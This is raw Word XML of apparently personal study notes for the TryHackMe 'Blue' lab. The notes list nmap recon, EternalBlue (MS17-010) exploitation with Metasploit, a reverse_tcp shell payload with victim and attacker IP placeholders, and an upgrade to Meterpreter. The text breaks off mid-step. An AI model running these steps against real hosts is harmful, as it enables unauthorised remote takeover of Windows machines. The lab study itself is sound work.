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5A16" w14:textId="05293CC6" w:rsidR="000D6F55" w:rsidRDefault="005473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Sources: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0D3BBE" w14:textId="65BA1B70" w:rsidR="00547387" w:rsidRDefault="00FE56C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00547387" w:rsidRPr="009F2C25">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://clearinfosec.com/tryhackme-walkthrough-blue/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5AE59868" w14:textId="28D2840C" w:rsidR="00547387" w:rsidRDefault="00FE56C0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00547387" w:rsidRPr="009F2C25">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://steflan-security.com/tryhackme-blue-walkthrough/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2C946DC4" w14:textId="2F208140" w:rsidR="00547387" w:rsidRDefault="00547387">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D0B3345" w14:textId="075F3FC9" w:rsidR="00547387" w:rsidRPr="009D54A3" w:rsidRDefault="00547387">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D54A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Task 1 Recon:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1EC4A1" w14:textId="785994A3" w:rsidR="00547387" w:rsidRDefault="00547387">
      <w:p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to scan for open ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA82535" w14:textId="01F53CA6" w:rsidR="00547387" w:rsidRPr="00547387" w:rsidRDefault="00547387">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Nmap -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 xml:space="preserve"> -A -T3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4615ED2C" w14:textId="7FA36B8F" w:rsidR="00547387" w:rsidRDefault="00547387">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B625505" w14:textId="7E1072D1" w:rsidR="00547387" w:rsidRDefault="00547387">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SMB vulnerability enumeration</w:t>
      </w:r>
      <w:r w:rsidR="00DA513D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> scanning using built in scripts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A496D6A" w14:textId="36384402" w:rsidR="00547387" w:rsidRDefault="00547387">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>Nmap --script vuln -p445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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2795DB9E" w14:textId="4637C14B" w:rsidR="00212125" w:rsidRDefault="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0021212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DCDA06" wp14:editId="24C613E0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5943600" cy="387223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F471D" w14:textId="22F85E89" w:rsidR="00212125" w:rsidRPr="00212125" w:rsidRDefault="00212125" w:rsidP="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D4F775A" w14:textId="5CA27968" w:rsidR="00212125" w:rsidRPr="00212125" w:rsidRDefault="00212125" w:rsidP="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60187015" w14:textId="2490C5A6" w:rsidR="00212125" w:rsidRPr="00212125" w:rsidRDefault="00212125" w:rsidP="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60FB39FC" w14:textId="20EC59BB" w:rsidR="00212125" w:rsidRPr="00212125" w:rsidRDefault="00212125" w:rsidP="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="263B24F7" w14:textId="4605DCE4" w:rsidR="00212125" w:rsidRPr="00212125" w:rsidRDefault="00212125" w:rsidP="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69F7E367" w14:textId="65DBD8AE" w:rsidR="00212125" w:rsidRPr="00212125" w:rsidRDefault="00212125" w:rsidP="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E148B7D" w14:textId="3538130D" w:rsidR="00212125" w:rsidRPr="00212125" w:rsidRDefault="00212125" w:rsidP="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="433FAEFE" w14:textId="7D2914DF" w:rsidR="00212125" w:rsidRPr="00212125" w:rsidRDefault="00212125" w:rsidP="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C129D9B" w14:textId="6135210B" w:rsidR="00212125" w:rsidRPr="00212125" w:rsidRDefault="00212125" w:rsidP="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E4185C0" w14:textId="42B50006" w:rsidR="00212125" w:rsidRPr="00212125" w:rsidRDefault="00212125" w:rsidP="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34CEC7E3" w14:textId="7BD723E8" w:rsidR="00212125" w:rsidRPr="00212125" w:rsidRDefault="00212125" w:rsidP="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07897053" w14:textId="3EA6C923" w:rsidR="00212125" w:rsidRPr="00212125" w:rsidRDefault="00212125" w:rsidP="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F7F2B45" w14:textId="6CABAA97" w:rsidR="00212125" w:rsidRPr="00212125" w:rsidRDefault="00212125" w:rsidP="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10BC495C" w14:textId="2257147B" w:rsidR="00212125" w:rsidRDefault="00212125" w:rsidP="00212125">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01B98628" w14:textId="55198C56" w:rsidR="00212125" w:rsidRPr="0095795E" w:rsidRDefault="00212125" w:rsidP="002121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Remote code execution </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vuln. (ms17-010)</w:t>
      </w:r>
      <w:r w:rsidR="00EA3904">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> through SMBv1</w:t>
      </w:r>
      <w:r w:rsidR="00712B46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50299E07" w14:textId="3CB6F5DB" w:rsidR="0095795E" w:rsidRDefault="0095795E" w:rsidP="0095795E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5044FFC5" w14:textId="77777777" w:rsidR="00072432" w:rsidRDefault="00072432" w:rsidP="0095795E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5202A953" w14:textId="70390458" w:rsidR="009D54A3" w:rsidRDefault="009D54A3" w:rsidP="0095795E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Task 2</w:t>
      </w:r>
      <w:r w:rsidR="000768D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="000768D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+  3</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Gain Access</w:t>
      </w:r>
      <w:r w:rsidR="000768D1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; Escalate</w:t>
      </w:r>
      <w:r w:rsidR="00CD47D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B1E042" w14:textId="4B619982" w:rsidR="00072432" w:rsidRDefault="00072432" w:rsidP="0095795E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E51D25">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attack Vector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B24BDE" w14:textId="040F15CE" w:rsidR="00072432" w:rsidRDefault="00072432" w:rsidP="0095795E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E51D25">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Method:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metasploit frameworks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58404D50" w14:textId="026D6501" w:rsidR="00154117" w:rsidRDefault="00E74179" w:rsidP="00E74179">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00F81B67">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00F81B67">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E74179">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E74179">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E74179">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/ms17_010_eternablue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2725DB3F" w14:textId="77777777" w:rsidR="00154117" w:rsidRPr="00E74179" w:rsidRDefault="00154117" w:rsidP="00E74179">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="150"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51C44059" w14:textId="158AEF7E" w:rsidR="00E74179" w:rsidRDefault="00154117" w:rsidP="0095795E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Should run an </w:t>
      </w:r>
      <w:r w:rsidRPr="00154117">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Auxiliary Scan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to make sure the host is truly vulnerable to that flaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E126E3F" w14:textId="18143D8F" w:rsidR="00154117" w:rsidRDefault="00154117" w:rsidP="0095795E">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Rubik" w:hAnsi="Rubik"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="212529"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Rubik" w:hAnsi="Rubik"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="212529"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Rubik" w:hAnsi="Rubik"/>
          <w:color w:val="212121"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Rubik" w:hAnsi="Rubik"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="212529"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Rubik" w:hAnsi="Rubik"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="212529"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Rubik" w:hAnsi="Rubik"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="212529"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/smb_ms17_010</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EA6A34" w14:textId="77777777" w:rsidR="00B52D69" w:rsidRDefault="00AB2AF6" w:rsidP="0095795E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Let Attack!</w:t>
      </w:r>
      <w:r w:rsidR="00B52D69">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B06B70" w14:textId="41F4E1DB" w:rsidR="00AB2AF6" w:rsidRPr="00B52D69" w:rsidRDefault="00B52D69" w:rsidP="00B52D69">
      <w:pPr>
        <w:ind w:left="720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Gain Shell Access</w:t>
      </w:r>
      <w:r w:rsidR="00C70A31">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidR="00C70A31" w:rsidRPr="00C70A31">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:vertAlign w:val="superscript"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidR="00C70A31">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00C70A31">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:r w:rsidR="00EF57AB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Not</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00EF57AB">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C70A31" w:rsidRPr="00C70A31">
        <w:rPr>
          <w:strike/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>metepreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C70A31" w:rsidRPr="00C70A31">
        <w:rPr>
          <w:strike/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B07F45">
        <w:rPr>
          <w:strike/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidR="00EF57AB">
        <w:rPr>
          <w:strike/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF57AB" w:rsidRPr="00EF57AB">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yet</w:t>
      </w:r>
      <w:r w:rsidR="00C70A31">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BBE372" w14:textId="21BE19EB" w:rsidR="009A1196" w:rsidRDefault="009A1196" w:rsidP="00B52D69">
      <w:pPr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Show options --- show module para options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7844E769" w14:textId="760DC33D" w:rsidR="00AB2AF6" w:rsidRPr="004B0B79" w:rsidRDefault="00AB2AF6" w:rsidP="00B52D69">
      <w:pPr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set payload windows/x64/shell/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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reverse_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B639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--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="004B639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set shell payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5391C907" w14:textId="69E36123" w:rsidR="00AB2AF6" w:rsidRPr="004B0B79" w:rsidRDefault="00AB2AF6" w:rsidP="00B52D69">
      <w:pPr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set RHOST </w:t>
      </w:r>
      <w:r w:rsidR="008D4CD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&lt;</w:t>
      </w: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victim </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008D4CD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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF50895" w14:textId="02F88849" w:rsidR="00AB2AF6" w:rsidRPr="004B0B79" w:rsidRDefault="00AB2AF6" w:rsidP="00B52D69">
      <w:pPr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set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="008D4CD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&lt;</w:t>
      </w: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attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008D4CD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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2245EC" w14:textId="60F8CFDB" w:rsidR="004720B6" w:rsidRPr="004B0B79" w:rsidRDefault="004720B6" w:rsidP="00B52D69">
      <w:pPr>
        <w:ind w:left="144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</w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="004B0B7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>run !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="444ADF72" w14:textId="20C3D5C1" w:rsidR="00B52D69" w:rsidRDefault="00B52D69" w:rsidP="00B52D69">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Rubik" w:hAnsi="Rubik"/>
          <w:color w:val="212529"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="007F7B4F">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upgrade to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B07F45">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter </w:t>
      </w:r>
      <w:r w:rsidR="00B07F45" w:rsidRPr="00B07F45">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r w:rsidRPr="00B07F45">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51477759" w14:textId="66AFB876" w:rsidR="00B52D69" w:rsidRDefault="00B52D69" w:rsidP="00B52D69">
      <w:pPr>
        <w:rPr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ab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="004B0B79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CTR + Z </w:t>
      </w:r>
      <w:r w:rsidR="004B0B79">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
